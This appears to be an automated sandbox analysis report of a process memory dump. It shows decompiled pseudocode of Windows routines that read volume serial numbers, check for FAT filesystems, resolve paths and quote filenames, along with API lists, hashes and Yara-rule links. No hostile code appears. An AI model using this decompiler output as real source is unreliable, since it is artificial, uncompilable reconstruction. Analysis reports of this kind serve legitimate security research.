				_v2136 = __ecx;
				_t146 = 0;
				_v1604 = 0x104;
				_v1612 = 0;
				_t120 = 1;
				_t145 = __edx;
				_v1608 = 1;
				memset( &_v2132, 0, 0x104);
				_v1076 = 0;
				_v1072 = 1;
				_v1068 = 0x104;
				memset( &_v1596, 0, 0x104);
				_v540 = 0;
				_v536 = 1;
				_v532 = 0x104;
				memset( &_v1060, 0, 0x104);
				_t122 =  &_v2132;
				if(E011E0C70( &_v2132, ((0 | _v1608 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					L46:
					_push(_t146);
					_push(8);
					E011DC5A2(_t122);
					_t146 = _t120;
					L47:
					_t120 = _t146;
					L48:
					_t147 = _t120;
					L49:
					__imp__??_V@YAXPAX@Z(_v540);
					__imp__??_V@YAXPAX@Z(_v1076);
					__imp__??_V@YAXPAX@Z();
					return E011E6FD0(_t147, _t120, _v8 ^ _t148, _t141, _t145, _t147, _v1612);
				}
				_t122 =  &_v1596;
				if(E011E0C70( &_v1596, ((0 | _v1072 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					goto L46;
				}
				_t122 =  &_v1060;
				if(E011E0C70( &_v1060, ((0 | _v536 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					goto L46;
				}
				E011E0D89(_t141, _t145);
				_t131 = _v1612;
				_t142 = _t131;
				if(_t131 == 0) {
					_t142 =  &_v2132;
				}
				_t145 = _t142 + 2;
				do {
					_t98 =  *_t142;
					_t142 = _t142 + 2;
				} while (_t98 != _t146);
				_t99 = _v540;
				_t144 = _t142 - _t145 >> 1;
				if(_v540 == 0) {
					_t99 =  &_v1060;
				}
				if(_t131 == 0) {
					_t131 =  &_v2132;
				}
				_t141 = _t144 + 1;
				if(E011E4C89(_t131, _t144 + 1, _t99, _v532) == 0) {
					goto L47;
				} else {
					E011E0CF2(_t141, "\\");
					_t133 = _v1076;
					if(_t133 == 0) {
						_t133 =  &_v1596;
					}
					_t102 = _v540;
					if(_t102 == 0) {
						_t102 =  &_v1060;
					}
					_t141 =  &_v2144;
					if(GetVolumeInformationW(_t102, _t133, _v1068,  &_v2144, _t146, _t146, _t146, _t146) != 0) {
						_t104 = _v540;
						_t134 = _t104;
						if(_t104 == 0) {
							_t134 =  &_v1060;
						}
						if( *_t134 != 0x5c) {
							if(_t104 == 0) {
								_t104 =  &_v1060;
							}
							 *((short*)(_t104 + 2)) = 0;
							goto L31;
						} else {
							if(_t104 == 0) {
								_t104 =  &_v1060;
							}
							_t138 = _t104;
							while( *_t104 != _t146) {
								_t138 = _t104;
								_t104 = _t104 + 2;
							}
							 *_t138 = 0;
							L31:
							_t105 = _v1076;
							_t136 = _t105;
							if(_t105 == 0) {
								_t136 =  &_v1596;
							}
							if( *_t136 == _t146) {
								_t106 = _v540;
								if(_v540 == 0) {
									_t106 =  &_v1060;
								}
								_t145 = _v2136;
								_t107 = E011F7C83(_t120, _t141, _v2136, 0x235e, _t120, _t106);
							} else {
								if(_t105 == 0) {
									_t105 =  &_v1596;
								}
								_t137 = _v540;
								if(_v540 == 0) {
									_t137 =  &_v1060;
								}
								_t145 = _v2136;
								_push(_t105);
								_t107 = E011F7C83(_t120, _t141, _v2136, 0x235f, 2, _t137);
							}
							_t147 = _t107;
							if(_t107 == 0) {
								_t108 = _v2144;
								if(_t108 != 0 || _v2140 != _t108) {
									_push(_t108 & 0x0000ffff);
									E011E274C( &_v524, 0x100, L"%04X-%04X", _v2142 & 0x0000ffff);
									_t147 = E011F7C83(_t120, _t141, _t145, 0x235b, _t120,  &_v524);
								}
							}
							goto L49;
						}
					} else {
						if(GetLastError() == 0x90) {
							goto L47;
						}
						_push(_t146);
						_push(GetLastError());
						E011DC5A2(_t133);
						goto L48;
					}
				}
			}









































                                                    0x011fa834
                                                    0x011fa83f
                                                    0x011fa846
                                                    0x011fa851
                                                    0x011fa858
                                                    0x011fa85a
                                                    0x011fa862
                                                    0x011fa86e
                                                    0x011fa871
                                                    0x011fa873
                                                    0x011fa879
                                                    0x011fa881
                                                    0x011fa88c
                                                    0x011fa892
                                                    0x011fa8a1
                                                    0x011fa8a9
                                                    0x011fa8b4
                                                    0x011fa8ba
                                                    0x011fa8c9
                                                    0x011fa8d0
                                                    0x011fa8f5
                                                    0x011fab2f
                                                    0x011fab2f
                                                    0x011fab30
                                                    0x011fab32
                                                    0x011fab39
                                                    0x011fab3b
                                                    0x011fab3b
                                                    0x011fab3d
                                                    0x011fab3d
                                                    0x011fab3f
                                                    0x011fab45
                                                    0x011fab52
                                                    0x011fab5f
                                                    0x011fab78
                                                    0x011fab78
                                                    0x011fa8fd
                                                    0x011fa91f
                                                    0x00000000
                                                    0x00000000
                                                    0x011fa927
                                                    0x011fa949
                                                    0x00000000
                                                    0x00000000
                                                    0x011fa956
                                                    0x011fa95b
                                                    0x011fa961
                                                    0x011fa965
                                                    0x011fa967
                                                    0x011fa967
                                                    0x011fa96d
                                                    0x011fa970
                                                    0x011fa970
                                                    0x011fa973
                                                    0x011fa976
                                                    0x011fa97b
                                                    0x011fa983
                                                    0x011fa987
                                                    0x011fa989
                                                    0x011fa989
                                                    0x011fa991
                                                    0x011fa993
                                                    0x011fa993
                                                    0x011fa99f
                                                    0x011fa9a8
                                                    0x00000000
                                                    0x011fa9ae
                                                    0x011fa9b9
                                                    0x011fa9be
                                                    0x011fa9c6
                                                    0x011fa9c8
                                                    0x011fa9c8
                                                    0x011fa9ce
                                                    0x011fa9d6
                                                    0x011fa9d8
                                                    0x011fa9d8
                                                    0x011fa9e2
                                                    0x011fa9f9
                                                    0x011faa20
                                                    0x011faa26
                                                    0x011faa2a
                                                    0x011faa2c
                                                    0x011faa2c
                                                    0x011faa36
                                                    0x011faa59
                                                    0x011faa5b
                                                    0x011faa5b
                                                    0x011faa63
                                                    0x00000000
                                                    0x011faa38
                                                    0x011faa3a
                                                    0x011faa3c
                                                    0x011faa3c
                                                    0x011faa42
                                                    0x011faa4b
                                                    0x011faa46
                                                    0x011faa48
                                                    0x011faa48
                                                    0x011faa52
                                                    0x011faa67
                                                    0x011faa67
                                                    0x011faa6d
                                                    0x011faa71
                                                    0x011faa73
                                                    0x011faa73
                                                    0x011faa7c
                                                    0x011faab2
                                                    0x011faaba
                                                    0x011faabc
                                                    0x011faabc
                                                    0x011faac2
                                                    0x011faad0
                                                    0x011faa7e
                                                    0x011faa80
                                                    0x011faa82
                                                    0x011faa82
                                                    0x011faa88
                                                    0x011faa90
                                                    0x011faa92
                                                    0x011faa92
                                                    0x011faa98
                                                    0x011faa9e
                                                    0x011faaa8
                                                    0x011faaad
                                                    0x011faad8
                                                    0x011faadc
                                                    0x011faade
                                                    0x011faae6
                                                    0x011faaf3
                                                    0x011fab0d
                                                    0x011fab2b
                                                    0x011fab2b
                                                    0x011faae6
                                                    0x00000000
                                                    0x011faadc
                                                    0x011fa9fb
                                                    0x011faa06
                                                    0x00000000
                                                    0x00000000
                                                    0x011faa0c
                                                    0x011faa13
                                                    0x011faa14
                                                    0x00000000
                                                    0x011faa1a
                                                    0x011fa9f9

                                                    APIs
                                                    • memset.MSVCRT ref: 011FA879
                                                    • memset.MSVCRT ref: 011FA8A1
                                                    • memset.MSVCRT ref: 011FA8C9
                                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                                    • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000000,00000000,00000000,00000000,011D21E8,?,?,?,-00000105,-00000105,-00000105), ref: 011FA9F1
                                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?), ref: 011FA9FB
                                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?), ref: 011FAA0D
                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011FAB45
                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011FAB52
                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011FAB5F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: memset$ErrorLast$InformationVolume
                                                    • String ID: %04X-%04X
                                                    • API String ID: 2748242238-1126166780
                                                    • Opcode ID: dc435e6aa930e89b14a801fb84479ad59ec97dd80b309e507a008080a3efba67
                                                    • Instruction ID: 94e9f4bf92a855db9f811c40c5fd1942edafa6ba79c4867ada87fcda2a5e8930
                                                    • Opcode Fuzzy Hash: dc435e6aa930e89b14a801fb84479ad59ec97dd80b309e507a008080a3efba67
                                                    • Instruction Fuzzy Hash: 6291C4B1A012295BDF29DA64DC44AEA77B9EF54258F4404EDE60DE3141EB349F88CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011E3121, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 167COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 66%
                                                    			E011E3121(void* __ecx, void* __edx) {
				signed int _v8;
				int _v20;
				char _v24;
				int _v28;
				void _v548;
				long _v556;
				char _v560;
				int _v564;
				void _v1084;
				int _v1092;
				char _v1096;
				void* _v1100;
				void _v1620;
				long _v1624;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t47;
				WCHAR* _t64;
				WCHAR* _t84;
				signed int _t86;
				void* _t87;
				WCHAR* _t89;
				WCHAR* _t102;
				void* _t110;
				void* _t111;
				signed int _t112;

				_t109 = __edx;
				_t47 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t47 ^ _t112;
				_v560 = 1;
				_t89 = 0;
				_v556 = 0x104;
				_v564 = 0;
				_t111 = __edx;
				_t110 = __ecx;
				memset( &_v1084, 0, 0x104);
				_v28 = 0;
				_v24 = 1;
				_v20 = 0x104;
				memset( &_v548, 0, 0x104);
				_v1100 = 0;
				_v1096 = 1;
				_v1092 = 0x104;
				memset( &_v1620, 0, 0x104);
				if(E011E0C70( &_v1084, ((0 | _v560 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0 || E011E0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0 || E011E0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					 *0x1213cf0 = 8;
					_t64 = _t89;
					goto L21;
				} else {
					_t79 = _v1100;
					 *0x1213cf0 = 0;
					if(_v1100 == 0) {
						_t79 =  &_v1620;
					}
					_t109 = _t111;
					if(E011E4C89(_t110, _t111, _t79, _v1092) != 0) {
						_t81 = _v1100;
						if(_v1100 == 0) {
							_t81 =  &_v1620;
						}
						E011E0D89(_t109, _t81);
						E011E0CF2(_t109, "\\");
						_t102 = _v564;
						if(_t102 == 0) {
							_t102 =  &_v1084;
						}
						_t84 = _v28;
						if(_t84 == 0) {
							_t84 =  &_v548;
						}
						if(GetVolumeInformationW(_t84, _t89, _t89, _t89,  &_v1624, _t89, _t102, _v556) == 0) {
							_t86 = GetLastError();
							_t46 = _t86 - 0x90; // -144
							asm("sbb ecx, ecx");
							 *0x1213cf0 =  ~_t46 & _t86;
						} else {
							_t87 = _v564;
							if(_t87 == 0) {
								_t87 =  &_v1084;
							}
							__imp___wcsicmp(_t87, L"FAT");
							if(_t87 == 0) {
								if(_v1624 == 0xc) {
									_t64 = 1;
									L21:
									_t89 = _t64;
								}
							}
						}
					}
				}
				__imp__??_V@YAXPAX@Z(_v1100);
				__imp__??_V@YAXPAX@Z(_v28);
				__imp__??_V@YAXPAX@Z();
				return E011E6FD0(_t89, _t89, _v8 ^ _t112, _t109, _t110, _t111, _v564);
			}






























                                                    0x011e3121
                                                    0x011e312c
                                                    0x011e3133
                                                    0x011e313e
                                                    0x011e3146
                                                    0x011e3148
                                                    0x011e3154
                                                    0x011e315c
                                                    0x011e315e
                                                    0x011e3160
                                                    0x011e3168
                                                    0x011e3170
                                                    0x011e3174
                                                    0x011e3180
                                                    0x011e3188
                                                    0x011e3193
                                                    0x011e319a
                                                    0x011e31a9
                                                    0x011e31d5
                                                    0x011edbf0
                                                    0x011edbfa
                                                    0x00000000
                                                    0x011e3229
                                                    0x011e3229
                                                    0x011e322f
                                                    0x011e3237
                                                    0x011e3239
                                                    0x011e3239
                                                    0x011e3245
                                                    0x011e3251
                                                    0x011e3257
                                                    0x011e325f
                                                    0x011e3261
                                                    0x011e3261
                                                    0x011e326e
                                                    0x011e327e
                                                    0x011e3283
                                                    0x011e328b
                                                    0x011edbb6
                                                    0x011edbb6
                                                    0x011e3291
                                                    0x011e3296
                                                    0x011e3310
                                                    0x011e3310
                                                    0x011e32b3
                                                    0x011edbd3
                                                    0x011edbd9
                                                    0x011edbe1
                                                    0x011edbe5
                                                    0x011e32b9
                                                    0x011e32b9
                                                    0x011e32c1
                                                    0x011e3318
                                                    0x011e3318
                                                    0x011e32c9
                                                    0x011e32d3
                                                    0x011edbc8
                                                    0x011edbd0
                                                    0x011edbfc
                                                    0x011edbfc
                                                    0x011edbfc
                                                    0x011edbc8
                                                    0x011e32d3
                                                    0x011e32b3
                                                    0x011e3251
                                                    0x011e32df
                                                    0x011e32e9
                                                    0x011e32f6
                                                    0x011e330f

                                                    APIs
                                                    • memset.MSVCRT ref: 011E3160
                                                    • memset.MSVCRT ref: 011E3180
                                                    • memset.MSVCRT ref: 011E31A9
                                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                                    • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,00000000,?,?,011D21E8,?,?,?,-00000105,-00000105,-00000105), ref: 011E32AB
                                                    • _wcsicmp.MSVCRT ref: 011E32C9
                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E32DF
                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E32E9
                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E32F6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: memset$InformationVolume_wcsicmp
                                                    • String ID: FAT
                                                    • API String ID: 4247940253-238207945
                                                    • Opcode ID: 17f0fed890c4f520608df4c101148aab6c829bea113fd70007e471f0c3852b99
                                                    • Instruction ID: 2f8af6c6ac2adc470c54c2c8a728e0d2c05dde3b0e6128891aa713d2ca43ffdb
                                                    • Opcode Fuzzy Hash: 17f0fed890c4f520608df4c101148aab6c829bea113fd70007e471f0c3852b99
                                                    • Instruction Fuzzy Hash: 365143B1A106199BDF28CAE4DC9DBEA77F8FB14348F0400E9E519E3141EB759E84CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011DAD44, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 152COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 79%
                                                    			E011DAD44(WCHAR* __ecx) {
				signed int _v8;
				void* _v608;
				long _v612;
				char _v616;
				int _v620;
				void* _v624;
				void _v1140;
				WCHAR* _v1144;
				WCHAR* _v1148;
				void* _v1152;
				void* _v1164;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t34;
				WCHAR* _t45;
				int _t48;
				wchar_t* _t49;
				long _t50;
				intOrPtr* _t51;
				signed int _t57;
				void* _t59;
				void* _t60;
				signed int _t61;
				WCHAR* _t62;
				void* _t78;
				void* _t81;
				signed int _t82;
				WCHAR* _t84;
				void* _t85;
				WCHAR* _t86;
				wchar_t* _t87;
				signed int _t89;
				signed int _t91;

				_t91 = (_t89 & 0xfffffff8) - 0x47c;
				_t32 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t32 ^ _t91;
				_push(_t59);
				_t84 = __ecx;
				_v1144 = __ecx;
				if(__ecx == 0) {
					_t34 = 0;
					L11:
					_pop(_t81);
					_pop(_t85);
					_pop(_t60);
					return E011E6FD0(_t34, _t60, _v8 ^ _t91, _t79, _t81, _t85);
				}
				_v616 = 1;
				_t82 = 0;
				_v612 = 0x104;
				_v620 = 0;
				memset( &_v1140, 0, 0x104);
				_t91 = _t91 + 0xc;
				if(E011E0C70( &_v1140, ((0 | _v616 == 0x00000000) - 0x00000001 & 0x0000fdc6) + 0x208) < 0) {
					L10:
					__imp__??_V@YAXPAX@Z(_v620);
					_t34 = _t82;
					goto L11;
				}
				_t45 = _v620;
				if(_t45 == 0) {
					_t45 =  &_v1140;
				}
				_t61 = GetFullPathNameW(E011E22C0(_t59, _t84), _v612, _t45,  &_v1148);
				if(_t61 == 0) {
					L9:
					_t82 = _t61;
					goto L10;
				} else {
					_t86 = _v620;
					if(_t86 == 0) {
						_t86 =  &_v1140;
					}
					_t48 = wcsncmp(_t86, L"\\\\.\\", 4);
					_t91 = _t91 + 0xc;
					if(_t48 == 0) {
						_t62 = _v1144;
						_t87 =  &(_t86[4]);
						_v1148 = _t87;
						_t49 = wcsstr(_t62, _t87);
						_v1148 = _t49;
						if(_t49 == 0 || _t49 <= _t62) {
							_t50 = GetFileAttributesW(_t62);
						} else {
							 *_t49 = 0;
							_t50 = GetFileAttributesW(_t62);
							 *_v1148 =  *_t49 & 0x0000ffff;
						}
						if(_t50 != 0xffffffff) {
							_t82 = _t50;
						}
						goto L10;
					} else {
						_t51 = _v1148;
						if(_t51 == 0 ||  *_t51 == _t82) {
							_t61 = 0 | GetFileAttributesW(_t86) != 0xffffffff;
						} else {
							_t79 = _t86;
							_t61 = E011E68BA(E011E6A00, _t86, 0x37, _t82, _t91 + 0x234,  &_v1144) & 0x000000ff;
							E011DCD27( *((intOrPtr*)(_t91 + 0x14)));
							if(_t61 == 0) {
								_t57 = _t86[1] & 0x0000ffff;
								_t78 = 0x5c;
								if(_t57 == _t78 || _t57 == 0x3a && _t86[2] == _t78 && _t86[3] == _t82) {
									if(GetDriveTypeW(_t86) > 1) {
										_t61 = 1;
									}
								}
							}
						}
						goto L9;
					}
				}
			}






































                                                    0x011dad4c
                                                    0x011dad52
                                                    0x011dad59
                                                    0x011dad60
                                                    0x011dad62
                                                    0x011dad64
                                                    0x011dad6b
                                                    0x011daeac
                                                    0x011dae71
                                                    0x011dae78
                                                    0x011dae79
                                                    0x011dae7a
                                                    0x011dae85
                                                    0x011dae85
                                                    0x011dad76
                                                    0x011dad7f
                                                    0x011dad81
                                                    0x011dad8c
                                                    0x011dad95
                                                    0x011dada0
                                                    0x011dadc0
                                                    0x011dae61
                                                    0x011dae68
                                                    0x011dae6f
                                                    0x00000000
                                                    0x011dae6f
                                                    0x011dadc6
                                                    0x011dadcf
                                                    0x011f122a
                                                    0x011f122a
                                                    0x011dadf0
                                                    0x011dadf4
                                                    0x011dae5f
                                                    0x011dae5f
                                                    0x00000000
                                                    0x011dadf6
                                                    0x011dadf6
                                                    0x011dadff
                                                    0x011f1233
                                                    0x011f1233
                                                    0x011dae0d
                                                    0x011dae13
                                                    0x011dae18
                                                    0x011f123c
                                                    0x011f1240
                                                    0x011f1245
                                                    0x011f1249
                                                    0x011f124f
                                                    0x011f1257
                                                    0x011f1276
                                                    0x011f125d
                                                    0x011f1263
                                                    0x011f1266
                                                    0x011f1270
                                                    0x011f1270
                                                    0x011f127f
                                                    0x011f1285
                                                    0x011f1285
                                                    0x00000000
                                                    0x011dae1e
                                                    0x011dae1e
                                                    0x011dae24
                                                    0x011f12b0
                                                    0x011dae33
                                                    0x011dae37
                                                    0x011dae53
                                                    0x011dae56
                                                    0x011dae5d
                                                    0x011dae86
                                                    0x011dae8c
                                                    0x011dae90
                                                    0x011f1296
                                                    0x011f129e
                                                    0x011f129e
                                                    0x011f1296
                                                    0x011dae90
                                                    0x011dae5d
                                                    0x00000000
                                                    0x011dae24
                                                    0x011dae18

                                                    APIs
                                                    • memset.MSVCRT ref: 011DAD95
                                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                                    • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,-00000209,00000000,?,00000001), ref: 011DADEA
                                                    • wcsncmp.MSVCRT(?,\\.\,00000004), ref: 011DAE0D
                                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011DAE68
                                                    • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000037,00000000,?,?), ref: 011F128D
                                                      • Part of subcall function 011E22C0: wcschr.MSVCRT ref: 011E22CC
                                                    • wcsstr.MSVCRT ref: 011F1249
                                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 011F1266
                                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 011F12A5
                                                      • Part of subcall function 011E68BA: FindFirstFileExW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000037,00000000,00000000,00000002,00000000,?,00000000,011E6A00,011E6A00,?,011DAE4F,00000037,00000000,?), ref: 011E68E6
                                                      • Part of subcall function 011DCD27: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,011F9362,00000000,00000000,?,011E9814,00000000), ref: 011DCD55
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000015.00000002.913116330.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                    • Associated: 00000015.00000002.913190282.0000000001219000.00000040.00000001.sdmp Download File
                                                    • Associated: 00000015.00000002.913210919.000000000121D000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: File$AttributesFindmemset$CloseDriveFirstFullNamePathTypewcschrwcsncmpwcsstr
                                                    • String ID: \\.\
                                                    • API String ID: 52035941-2900601889
                                                    • Opcode ID: 538ca310f4d7d64a4e453fcb6db8789f359e8cdf660569385473e9f82fb66834
                                                    • Instruction ID: b9982ff7bba0fc8d7c8cb2771a2f88bc23f943d8e867d9336029e6e3ccd5e984
                                                    • Opcode Fuzzy Hash: 538ca310f4d7d64a4e453fcb6db8789f359e8cdf660569385473e9f82fb66834
                                                    • Instruction Fuzzy Hash: DE411C75504351ABDB38DFA8A888A6FBBE8EF94714F14081DF955C3181EB30D944C7A3
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 011FAEE5, Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 337COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 85%
                                                    			E011FAEE5(void* __ecx, void* __eflags, signed int _a4, int _a8) {
				signed int _v8;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void* _v66;
				intOrPtr _v70;
				intOrPtr _v74;
				intOrPtr _v78;
				intOrPtr _v82;
				intOrPtr _v86;
				intOrPtr _v90;
				intOrPtr _v94;
				intOrPtr _v98;
				short _v100;
				intOrPtr _v104;
				signed int _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				char _v124;
				signed char _v125;
				signed int _v132;
				int _v136;
				signed int _v140;
				signed short* _v144;
				void* _v148;
				signed int _v152;
				int _v156;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t96;
				signed int _t105;
				void* _t111;
				long _t113;
				void* _t115;
				signed int _t122;
				signed int _t123;
				signed int _t124;
				signed int _t125;
				void* _t126;
				void* _t129;
				signed int _t138;
				void _t142;
				long _t144;
				long _t146;
				signed short* _t154;
				void* _t157;
				signed short _t164;
				signed int _t171;
				signed int _t173;
				signed char _t177;
				signed char _t179;
				long _t180;
				int _t185;
				void* _t188;
				signed int _t191;
				void* _t192;
				void* _t193;
				signed int* _t194;
				int _t197;
				signed short* _t198;
				void* _t199;
				int _t200;
				signed short* _t203;
				intOrPtr _t204;
				signed int _t205;
				void* _t206;

				_t96 =  *0x11fd0b4; // 0x1805bc26
				_v8 = _t96 ^ _t205;
				_t154 = __ecx;
				_v148 = __ecx;
				_v136 = _a8;
				_v108 = 0;
				_v100 = 0;
				_v124 = 0;
				_v120 = 0;
				_v116 = 0;
				_v112 = 0;
				_v104 = 0;
				_v98 = 0;
				_v94 = 0;
				_v90 = 0;
				_v86 = 0;
				_v82 = 0;
				_v78 = 0;
				_v74 = 0;
				_v70 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_v52 = 0;
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v28 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				E011FB4DD(0);
				_t157 = 0x2c;
				_t191 = E011E00B0(_t157);
				if(_t191 == 0) {
					E011F9287(_t157);
					__imp__longjmp(0x120b8b8, 1);
				}
				_t187 =  &_v124;
				 *((intOrPtr*)(_t191 + 8)) = 0x800;
				asm("sbb esi, esi");
				_t197 =  ~_a4 & 0x00000010;
				E011DCB48( &_v124);
				_t159 = _v48;
				if(_v48 == 0 || E011E3B5D(_t159,  &_v124) == 1) {
					L57:
					E011E5D39();
					_t105 = 0;
				} else {
					_t187 = 0;
					if(E011E4800( &_v124, 0, 1,  &_v132) == 1) {
						goto L57;
					} else {
						_t187 = _t191;
						_t197 = _v132;
						_t111 = E011E5590(_t197, _t191, _t197, _t197, 0, 0, 0, 0, 0, 0);
						if(_t111 != 0) {
							goto L57;
						} else {
							if( *(_t197 + 0x14) != _t111) {
								qsort( *(_t197 + 0x1c),  *(_t197 + 0x14), 4, E011F9C40);
								_t206 = _t206 + 0x10;
							}
							_t164 = 0x22;
							_t198 = _t154;
							_v125 = 0;
							_t191 = 0;
							_t187 = 2;
							while(1) {
								_t113 =  *_t198 & 0x0000ffff;
								if(_t113 == 0) {
									break;
								}
								if(_t113 != _t164) {
									if(wcschr(L" &()[]{}^=;!%\'+,`~", _t113) != 0) {
										_v125 = 1;
									}
									_t187 = 2;
									 *_t154 =  *_t198;
									_t164 = 0x22;
									goto L18;
								} else {
									_t185 = _v136;
									_t191 = _t191 + _t187;
									_v125 = 1;
									_t198 = _t198 + _t187;
									if(_t185 >= _t191 >> 1) {
										_v136 = _t185 - 1;
									}
									_t164 = 0x22;
									if( *_t198 == _t164) {
										 *_t154 = _t164;
										L18:
										_t154 = _t154 + _t187;
										_t198 = _t198 + _t187;
										_t191 = _t191 + _t187;
									}
								}
								if((_t191 & 0xfffffffe) < 0x4000) {
									continue;
								}
								break;
							}
							 *_t154 = 0;
							_t154 = _v132;
							_t197 = _t154[0xa];
							_v156 = _t197;
							_t115 = calloc(4, _t197);
							 *0x121853c = _t115;
							if(_t115 == 0) {
								goto L57;
							} else {
								_v140 = 0;
								_t191 = 0;
								_v132 = 0;
								if(_t197 > 0) {
									do {
										_t187 = ".";
										_t171 =  *((intOrPtr*)(_t154[0xe] + _t191 * 4)) + 0x30;
										_t122 = _t171;
										while(1) {
											_t197 =  *_t122;
											if(_t197 !=  *_t187) {
												break;
											}
											if(_t197 == 0) {
												L27:
												_t123 = 0;
											} else {
												_t197 =  *((intOrPtr*)(_t122 + 2));
												_t53 = _t187 + 2; // 0x200000
												if(_t197 !=  *_t53) {
													break;
												} else {
													_t122 = _t122 + 4;
													_t187 = _t187 + 4;
													if(_t197 != 0) {
														continue;
													} else {
														goto L27;
													}
												}
											}
											L29:
											if(_t123 != 0) {
												_t187 = L"..";
												_t124 = _t171;
												while(1) {
													_t199 =  *_t124;
													if(_t199 !=  *_t187) {
														break;
													}
													if(_t199 == 0) {
														L35:
														_t197 = 0;
														_t125 = 0;
													} else {
														_t204 =  *((intOrPtr*)(_t124 + 2));
														_t55 = _t187 + 2; // 0x2e
														if(_t204 !=  *_t55) {
															break;
														} else {
															_t124 = _t124 + 4;
															_t187 = _t187 + 4;
															if(_t204 != 0) {
																continue;
															} else {
																goto L35;
															}
														}
													}
													L37:
													if(_t125 != 0) {
														_t188 = _t171 + 2;
														do {
															_t126 =  *_t171;
															_t171 = _t171 + 2;
														} while (_t126 != _t197);
														_t197 = _v136;
														_t173 = _t171 - _t188 >> 1;
														_v152 = _t173;
														_t129 = calloc(_t197 + 4 + _t173, 2);
														_t187 =  *0x121853c;
														 *(_t187 + _v140 * 4) = _t129;
														if(_t129 != 0) {
															_t177 = _v125;
															if(_t177 != 0) {
																_v144 = 0;
															} else {
																_t203 =  *((intOrPtr*)(_t154[0xe] + _t191 * 4)) + 0x30;
																_v144 = _t203;
																_t144 =  *_t203 & 0x0000ffff;
																if(_t144 != 0) {
																	_t180 = _t144;
																	do {
																		if(wcschr(L" &()[]{}^=;!%\'+,`~", _t180) != 0) {
																			_v125 = 1;
																		}
																		_t203 =  &(_t203[1]);
																		_t146 =  *_t203 & 0x0000ffff;
																		_t180 = _t146;
																	} while (_t146 != 0);
																	_t177 = _v125;
																	_t187 =  *0x121853c;
																	_v144 = _t203;
																}
																_t197 = _v136;
															}
															_t192 =  *(_t187 + _v140 * 4);
															if(_t177 != 0) {
																_t142 = 0x22;
																 *_t192 = _t142;
																_t192 = _t192 + 2;
															}
															_t200 = _t197 + _t197;
